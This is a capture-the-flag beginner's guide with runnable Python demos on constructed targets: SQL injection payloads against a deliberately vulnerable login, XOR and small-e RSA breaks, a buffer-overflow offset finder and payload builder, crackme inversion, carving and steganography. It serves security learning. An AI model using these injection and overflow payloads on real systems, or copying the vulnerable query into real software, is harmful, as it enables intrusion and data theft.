Key Takeaways
- CTFs are one of the most effective hands-on ways to learn offensive security: you practise real techniques against targets you are allowed to attack
- Specialize in 1-2 categories first
- Write-ups help you learn from others
- Practice on past challenges regularly
1. What is Capture The Flag?
CTF competitions are cybersecurity challenges in which participants solve security puzzles to find hidden "flags" (usually short text strings in a fixed format such as flag{s0m3_t3xt}) and submit them for points. They are a practical, low-risk way to build hands-on security skills: every target is intentionally vulnerable and in scope.
CTF Formats
- Jeopardy: Independent challenges grouped by category (web, crypto, pwn, reversing, forensics) with point values; solve as many as you can before the clock runs out
- Attack-Defense: Every team runs the same set of vulnerable services; you patch your own copies while exploiting the other teams' copies to steal their flags
- King of the Hill: Teams compete to compromise shared targets and hold control of them; points accrue for the time a team stays in control
2. Web Exploitation
Common Web Challenges
# Look for these vulnerabilities:
# - SQL Injection
# - XSS (Cross-Site Scripting)
# - SSTI (Server-Side Template Injection)
# - File Upload/LFI/RFI
# - SSRF
# - Authentication bypasses
# Tools
Burp Suite, OWASP ZAP
sqlmap, ffuf, gobuster
Browser DevTools (F12)
# Quick checks
robots.txt, exposed .git/ directories (dump the repository), backup and editor temp files (.bak, .old, .swp)
Source code comments (HTML, JavaScript, and any leaked server-side code)
Hidden parameters (fuzz GET/POST parameter names, not just paths)
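The SQL injection item from the list above, as an added example that is not part of the original page: a login backend built on the standard-library sqlite3 module, with the vulnerable string-built query next to the parameterised version. The database, table layout and flag value are constructed for the demo.

```python
import sqlite3

FLAG = "flag{constructed_sqli_example}"  # constructed for this example, not a real flag


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for a challenge's login backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, flag TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", ("admin", "hunter2", FLAG))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The bug CTF web challenges love: user input pasted straight into the SQL text."""
    query = ("SELECT flag FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: a quote in the payload is just data."""
    row = conn.execute(
        "SELECT flag FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Payloads a player tries once a stray quote in the username produces an SQL error:
BYPASS_USER = "admin'--"                              # comments out the password check
TAUTOLOGY = "' OR 1=1--"                              # WHERE clause true for every row
UNION_DUMP = "' UNION SELECT password FROM users--"   # reads a column the page never shows


if __name__ == "__main__":
    db = make_db()
    print("bypass   :", login_vulnerable(db, BYPASS_USER, "x"))
    print("union    :", login_vulnerable(db, UNION_DUMP, "x"))
    print("hardened :", login_safe(db, BYPASS_USER, "x"))
```

The vulnerable function returns the flag for the first two payloads and leaks another column for the third; the parameterised one returns nothing for all of them, which is the behaviour to look for when you are deciding whether a target is worth more sqlmap time.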
3. Cryptography
# Common crypto challenges:
# - Caesar/ROT13/substitution ciphers
# - XOR with repeating key
# - RSA with weak parameters
# - Hash cracking
# - Padding oracle attacks
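Breaking repeating-key XOR from the list above, as an added example that is not from the original page. The two-stage attack is the standard one: guess the key length by Hamming distance between adjacent ciphertext blocks (blocks that line up with the key differ only as the plaintext does), then split the ciphertext into one column per key byte and solve each column as a single-byte XOR by English letter frequency. The plaintext, key and scoring weights are constructed for the demo.

```python
# Rough English letter/space frequencies (percent) used to score candidate plaintexts.
FREQ = {"e": 12.7, "t": 9.1, "a": 8.2, "o": 7.5, "i": 7.0, "n": 6.7, "s": 6.3,
        "h": 6.1, "r": 6.0, "d": 4.3, "l": 4.0, "u": 2.8, " ": 13.0}


def _score_byte(b: int) -> float:
    c = chr(b).lower()
    if c in FREQ:
        return FREQ[c]
    if 32 <= b < 127 or b in b"\n\r\t":
        return 0.0
    return -50.0  # control/high bytes: almost never the right key byte


SCORE = [_score_byte(b) for b in range(256)]  # 256-entry lookup table


def xor(data: bytes, key: bytes) -> bytes:
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))


def hamming(a: bytes, b: bytes) -> int:
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def rank_key_lengths(ct: bytes, lo: int = 2, hi: int = 20) -> list:
    """Key lengths ordered by mean normalised Hamming distance of adjacent blocks.
    The true length (and its multiples) score lowest."""
    ranked = []
    for klen in range(lo, hi + 1):
        blocks = [ct[i:i + klen] for i in range(0, len(ct) - klen + 1, klen)]
        pairs = list(zip(blocks, blocks[1:]))
        if len(pairs) < 2:
            continue
        ranked.append((sum(hamming(a, b) for a, b in pairs) / len(pairs) / klen, klen))
    return [klen for _, klen in sorted(ranked)]


def break_single_xor(column: bytes) -> int:
    """Best single key byte for one column, judged by how English the result looks."""
    return max(range(256), key=lambda k: sum(SCORE[b ^ k] for b in column))


def shortest_period(key: bytes) -> bytes:
    """Collapse a key recovered at a multiple of its real length, e.g. 'abab' -> 'ab'."""
    for p in range(1, len(key) + 1):
        if len(key) % p == 0 and key[:p] * (len(key) // p) == key:
            return key[:p]
    return key


def break_repeating_xor(ct: bytes, candidates: int = 4):
    """Return (key, plaintext) for the best-scoring of the top `candidates` key lengths."""
    best = None
    for klen in rank_key_lengths(ct)[:candidates]:
        key = bytes(break_single_xor(ct[i::klen]) for i in range(klen))
        pt = xor(ct, key)
        score = sum(SCORE[b] for b in pt)
        if best is None or score > best[0]:
            best = (score, key, pt)
    _, key, pt = best
    return shortest_period(key), pt


# Constructed challenge: this plaintext and key are not from any real CTF.
PLAINTEXT = (
    b"Capture the flag contests reward patience and curiosity. The player who reads every "
    b"error message, saves every hint, and keeps careful notes usually finds the flag before "
    b"the one who guesses at random. When a cipher repeats its key, the ciphertext leaks "
    b"structure: bytes encrypted under the same key byte share the statistics of the "
    b"underlying language, so each position of the key can be attacked on its own as a "
    b"simple single byte xor. Guess the key length first, split the ciphertext into columns, "
    b"and then let the letter frequencies and the spaces between words do the rest of the "
    b"work for you. Practice this on the cryptopals exercises until it feels routine."
)
KEY = b"Hunter2!"
CIPHERTEXT = xor(PLAINTEXT, KEY)

if __name__ == "__main__":
    key, pt = break_repeating_xor(CIPHERTEXT)
    print(key, pt[:60])
```

Trying the top few key lengths and keeping the best plaintext, rather than trusting the single lowest Hamming score, is what makes this robust on short ciphertexts; shortest_period handles the case where the winner was a multiple of the real key length.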
# Tools
CyberChef (essential!)
dcode.fr
RsaCtfTool (RSA attacks)
hashcat, john the ripper
# Quick wins
# Base64, hex, binary encoding
# RSA: small e with a short unpadded message (take the integer e-th root of c), a prime shared between two moduli (gcd), small d (Wiener attack), n small enough to factor
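The small-e quick win, as an added example that is not from the original page: a seeded toy key with e = 3 (a Miller-Rabin helper generates the primes so the key is valid, but they are constructed for the demo and far too small for real use), a short message encrypted without padding, and the attack. Because m^3 is smaller than n the ciphertext is literally m^3 as an integer, so an integer cube root recovers m; the loop over c + k*n also covers the case where m^3 wrapped around n a handful of times.

```python
import random
from math import gcd


def is_probable_prime(n: int, rng: random.Random, rounds: int = 32) -> bool:
    """Miller-Rabin; good enough for a demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits: int, e: int, rng: random.Random) -> int:
    """Random prime of the requested size with gcd(e, p-1) == 1 so d exists."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand, rng) and gcd(e, cand - 1) == 1:
            return cand


def make_small_e_key(bits: int = 256, e: int = 3, seed: int = 1337):
    """Deterministic (seeded) toy key n = p*q with e = 3; constructed for the demo."""
    rng = random.Random(seed)
    p = gen_prime(bits, e, rng)
    q = gen_prime(bits, e, rng)
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    return n, e, d


def encrypt(m: int, n: int, e: int) -> int:
    """Textbook RSA, no padding: exactly the mistake the attack needs."""
    return pow(m, e, n)


def iroot(x: int, k: int) -> int:
    """Floor of the integer k-th root (Newton's method on integers)."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + k - 1) // k)  # starts at or above the true root
    while True:
        y = ((k - 1) * r + x // r ** (k - 1)) // k
        if y >= r:
            return r
        r = y


def small_e_attack(c: int, n: int, e: int, max_wraps: int = 10000):
    """If m**e never wrapped around n (or wrapped only a few times), the root is exact."""
    for k in range(max_wraps):
        m = iroot(c + k * n, e)
        if m ** e == c + k * n:
            return m
    return None


if __name__ == "__main__":
    n, e, d = make_small_e_key()
    m = int.from_bytes(b"flag{cube_root}", "big")
    c = encrypt(m, n, e)
    recovered = small_e_attack(c, n, e)
    print(recovered.to_bytes(15, "big"))
```

The check that tells you this attack applies is cheap: if e is tiny and the challenge's ciphertext is much shorter than the modulus, try the root before anything else.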
4. Binary Exploitation (Pwn)
# Binary exploitation challenges:
# - Buffer overflow
# - Format string
# - Return-Oriented Programming (ROP)
# - Heap exploitation
# Tools
pwntools (Python)
gdb + gef/pwndbg
ROPgadget, ropper
checksec
# Approach
1. checksec (what protections?)
2. Find vulnerability (overflow, format string)
3. Control EIP/RIP (find the exact offset to the saved return address with a cyclic pattern)
4. Bypass mitigations (leak an address to defeat ASLR/PIE, ROP or ret2libc instead of injected shellcode when NX is on, leak or brute-force the stack canary)
5. Get shell / read flag
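Step 3 of the approach above, as an added example not taken from the page: a pure-Python equivalent of pwntools' cyclic()/cyclic_find() so it runs without pwntools or a target binary. The crash is simulated by taking the four pattern bytes that would have landed in EIP; against a real binary you read that value out of gdb after feeding the program the pattern.

```python
import itertools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes = ALPHABET, n: int = 4):
    """Lazily yield the de Bruijn sequence B(k, n): every n-byte window occurs exactly
    once, so any n bytes found in a register pin down a unique offset in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern (what pwntools' cyclic() gives you)."""
    return bytes(itertools.islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(needle: bytes, n: int = 4) -> int:
    """Offset of the n-byte window `needle` in the pattern, or -1 if it never occurs."""
    needle = bytes(needle[:n])
    window = bytearray()
    for i, b in enumerate(de_bruijn(ALPHABET, n)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if bytes(window) == needle:
            return i - n + 1
    return -1


def find_offset(crashed_value: int, width: int = 4) -> int:
    """Recover the overflow offset from the value sitting in EIP/RIP (or at RSP) at the crash.
    Registers hold the pattern bytes little-endian, so convert back before searching."""
    return cyclic_find(crashed_value.to_bytes(width, "little")[:4])


def build_payload(offset: int, ret_addr: int, width: int = 4) -> bytes:
    """Padding up to the saved return address, then the address to jump to."""
    fmt = "<I" if width == 4 else "<Q"
    return b"A" * offset + struct.pack(fmt, ret_addr)


if __name__ == "__main__":
    pattern = cyclic(200)            # what you would send to the program
    eip = int.from_bytes(pattern[68:72], "little")   # simulated: EIP as gdb would show it
    off = find_offset(eip)
    print(hex(eip), off, build_payload(off, 0x08049196)[-4:])
```

On x86-64 a non-canonical address never reaches RIP, so take the eight bytes at RSP at the crash instead and pass width=8; the first four bytes still identify the offset.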
5. Reverse Engineering
# Reverse engineering challenges:
# - Understand program logic
# - Find password/key
# - Bypass checks
# - Deobfuscate code
# Tools
Ghidra (free, powerful)
IDA Pro (industry standard)
radare2/Cutter
dnSpy (.NET)
jadx (Android)
# Approach
1. Identify file type (file, binwalk)
2. Find main function
3. Locate key checks
4. Understand the check well enough to compute a valid input, or patch the binary so the check always passes
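A constructed crackme, added here as an example that is not from the page or any real challenge: check() is the validation routine as you would reconstruct it from the decompiler, with the target bytes that in a real binary would sit in .rodata; solve() runs the same transform backwards, which is the "understand the logic" route (the alternative being to patch the final comparison so it always succeeds). The seed, constants and target bytes are all made up for the demo.

```python
# Bytes the binary compares the transformed password against (constructed).
TARGET = bytes.fromhex("41cb5e1414548c202cf2c8b1")
SEED = 0x5A  # initial state, the kind of constant you spot in the decompiler


def rotl8(v: int, n: int) -> int:
    return ((v << n) | (v >> (8 - n))) & 0xFF


def rotr8(v: int, n: int) -> int:
    return ((v >> n) | (v << (8 - n))) & 0xFF


def check(password: bytes) -> bool:
    """The validation loop as recovered from the binary: XOR with running state,
    add a position-dependent constant, rotate, compare byte by byte."""
    if len(password) != len(TARGET):
        return False
    state = SEED
    for i, b in enumerate(password):
        v = rotl8(((b ^ state) + 7 * i) & 0xFF, 3)
        if v != TARGET[i]:      # early exit: one more hint the check is per byte
            return False
        state = v
    return True


def solve() -> bytes:
    """Every step above is invertible, so walk it backwards: no brute force needed."""
    state = SEED
    out = bytearray()
    for i, t in enumerate(TARGET):
        v = rotr8(t, 3)                      # undo the rotate
        out.append(((v - 7 * i) & 0xFF) ^ state)   # undo the add, then the XOR
        state = t                            # the binary's state after an accepted byte
    return bytes(out)


if __name__ == "__main__":
    pw = solve()
    print(pw, check(pw))
```

When the transform is not invertible (a hash, or a check that discards bits), the same reconstruction still tells you the search space, and that is when patching the jump or brute-forcing per byte becomes the better route.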
6. Forensics
# Forensics challenges:
# - File carving
# - Steganography
# - Memory analysis
# - Network packet analysis
# - Disk image analysis
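Step 1 of the reverse-engineering approach ("file, binwalk") and the file-carving item above share one added example, which is not from the original page: a minimal file/binwalk/strings scan over a constructed blob shaped like a PNG with a ZIP appended, the classic CTF polyglot. The signature table is a small subset of what the real tools know, and the blob is made up.

```python
import re

# Magic numbers a file/binwalk-style scan looks for (small constructed subset).
SIGNATURES = [
    ("ELF", b"\x7fELF"),
    ("PNG", b"\x89PNG\r\n\x1a\n"),
    ("JPEG", b"\xff\xd8\xff"),
    ("GZIP", b"\x1f\x8b\x08"),
    ("ZIP", b"PK\x03\x04"),
    ("PDF", b"%PDF-"),
]


def identify(data: bytes) -> str:
    """What `file` would say about the start of the blob."""
    for name, magic in SIGNATURES:
        if data.startswith(magic):
            return name
    return "data"


def carve(data: bytes):
    """Every signature occurrence at any offset, sorted: the core of binwalk's scan."""
    hits = []
    for name, magic in SIGNATURES:
        start = 0
        while (pos := data.find(magic, start)) != -1:
            hits.append((pos, name))
            start = pos + 1
    return sorted(hits)


def strings(data: bytes, min_len: int = 4):
    """Printable ASCII runs, as the `strings` tool prints them."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def extract(data: bytes, offset: int) -> bytes:
    """Naive carve: everything from the signature to the end of the blob
    (binwalk -e does the same, then lets the real parser trim it)."""
    return data[offset:]


# Constructed sample: a "PNG" header and chunk name, a planted string, then a ZIP
# local-file header after the image data. Not a valid image or archive.
BLOB = (
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 12 + b"IHDR" + b"\x00" * 16
    + b"flag{not_really_an_image}" + b"\x00" * 8
    + b"PK\x03\x04" + b"\x14\x00" + b"secret.txt" + b"\x00" * 4
)

if __name__ == "__main__":
    print(identify(BLOB))
    print(carve(BLOB))
    print(strings(BLOB))
    print(extract(BLOB, carve(BLOB)[-1][0])[:16])
```

The lesson the polyglot teaches is that `file` only reads the first signature, so a clean answer from it is not evidence there is nothing else in the blob; always run the full-offset scan as well.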
# Tools
Autopsy (disk forensics)
Volatility (memory)
Wireshark (network)
steghide, zsteg, binwalk
exiftool (metadata)
# Quick checks
strings, file, binwalk
Check LSB steganography
Look for hidden partitions, and for data appended after the end of a file
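One way to check the LSB plane, added here as an example that is not from the page: the grayscale cover image is represented as a raw byte array rather than a PNG so the block needs no image library; with a real file you would take the pixel bytes from Pillow or let zsteg run the scan. The cover gradient and the message are constructed, and the 32-bit length header is just a common convention, not a standard.

```python
def embed_lsb(cover: bytes, message: bytes) -> bytes:
    """Hide a 32-bit length header plus the message in the LSB of successive bytes."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for the message")
    out = bytearray(cover)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit   # each pixel changes by at most 1
    return bytes(out)


def lsb_plane(data: bytes) -> bytes:
    """Pack the LSB of every byte into bytes, MSB first: the thing to run strings on."""
    bits = [b & 1 for b in data]
    return bytes(
        int("".join(map(str, bits[i:i + 8])).ljust(8, "0"), 2)
        for i in range(0, len(bits), 8)
    )


def extract_lsb(stego: bytes) -> bytes:
    """Read the length header from the LSB plane, then that many bytes of message."""
    plane = lsb_plane(stego)
    length = int.from_bytes(plane[:4], "big")
    return plane[4:4 + length]


# Constructed 32x32 8-bit "image": a smooth gradient, so a changed LSB is invisible.
COVER = bytes((x * 7 + y * 3) & 0xFF for y in range(32) for x in range(32))
MESSAGE = b"flag{lsb_constructed}"

if __name__ == "__main__":
    stego = embed_lsb(COVER, MESSAGE)
    print(extract_lsb(stego))
    print(lsb_plane(stego)[:8].hex())
```

When the challenge gives no hint about the layout, dump lsb_plane() of the pixel data and run strings over it; a readable run near the start is the tell. Colour images have three planes per pixel and bit order varies, which is exactly the space zsteg enumerates for you.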
7. Misc & OSINT
# Miscellaneous challenges:
# - Programming/scripting
# - Trivia/research
# - Unconventional puzzles
# - OSINT investigation
# OSINT approach
Reverse image search
EXIF data
Social media investigation
Geolocation
# Scripting (Python is essential)
# Automate repetitive tasks
# Parse large files
# Interact with services
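The "interact with services" point above, as an added example that is not part of the original page: a constructed local stand-in for the classic "answer N arithmetic problems before the timeout" service, wired over socket.socketpair() so it runs offline. Against a real challenge you would replace the socketpair with socket.create_connection((host, port)) or pwntools' remote(); the problem list and flag are made up.

```python
import re
import socket
import threading
from typing import Optional

FLAG = b"flag{constructed_service_bot}"   # constructed, not a real flag
PROBLEMS = [(12, "+", 7), (9, "*", 8), (100, "-", 58), (6, "*", 7), (81, "+", 19)]
OPS = {"+": lambda a, b: a + b, "-": lambda a, b: a - b, "*": lambda a, b: a * b}


def challenge_server(conn: socket.socket) -> None:
    """Constructed stand-in for the remote service: one problem per line, flag at the end."""
    reader = conn.makefile("rb")
    try:
        for a, op, b in PROBLEMS:
            conn.sendall(f"Solve: {a} {op} {b}\n".encode())
            answer = reader.readline().strip()
            try:
                ok = int(answer) == OPS[op](a, b)
            except ValueError:
                ok = False
            if not ok:
                conn.sendall(b"Wrong!\n")
                return
        conn.sendall(b"Correct! " + FLAG + b"\n")
    finally:
        reader.close()
        conn.close()   # always close, or the client would block forever on readline


def solve(sock: socket.socket) -> Optional[bytes]:
    """The bot: parse each prompt with a regex, answer it, stop when the flag arrives."""
    reader = sock.makefile("rb")
    while True:
        line = reader.readline()
        if not line:                     # server hung up (wrong answer or timeout)
            return None
        m = re.match(rb"Solve: (-?\d+) ([-+*]) (-?\d+)", line)
        if m:
            a, op, b = int(m.group(1)), m.group(2).decode(), int(m.group(3))
            sock.sendall(b"%d\n" % OPS[op](a, b))
        elif line.startswith(b"Correct! "):
            return line[len(b"Correct! "):].strip()


def run_local() -> Optional[bytes]:
    """Run server and bot over a socketpair in-process; returns the flag the bot extracted."""
    server_end, client_end = socket.socketpair()
    t = threading.Thread(target=challenge_server, args=(server_end,), daemon=True)
    t.start()
    try:
        return solve(client_end)
    finally:
        client_end.close()
        t.join(timeout=5)


if __name__ == "__main__":
    print(run_local())
```

The parts worth copying into a real solve script are the line-oriented reader and the regex: most "speed" challenges fail by hand only because the prompt format is easy for a human to read and easy to mis-parse in a hurry.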
8. Learning Resources
Practice Platforms
- PicoCTF: Beginner-friendly
- HackTheBox: Machines and challenges
- TryHackMe: Guided learning paths
- OverTheWire: Linux/security games
- pwnable.kr: Pwn challenges
- cryptopals.com: Crypto challenges
CTF Calendar
- CTFtime.org: Find upcoming CTFs
- Team rankings: Track your team's standing across events
- Write-up archive: Learn from other teams' published solutions after each event
FAQ
I'm a beginner, where do I start?
Start with PicoCTF or TryHackMe beginner paths. Focus on web and crypto first as they're most accessible. Read write-ups after attempting challenges.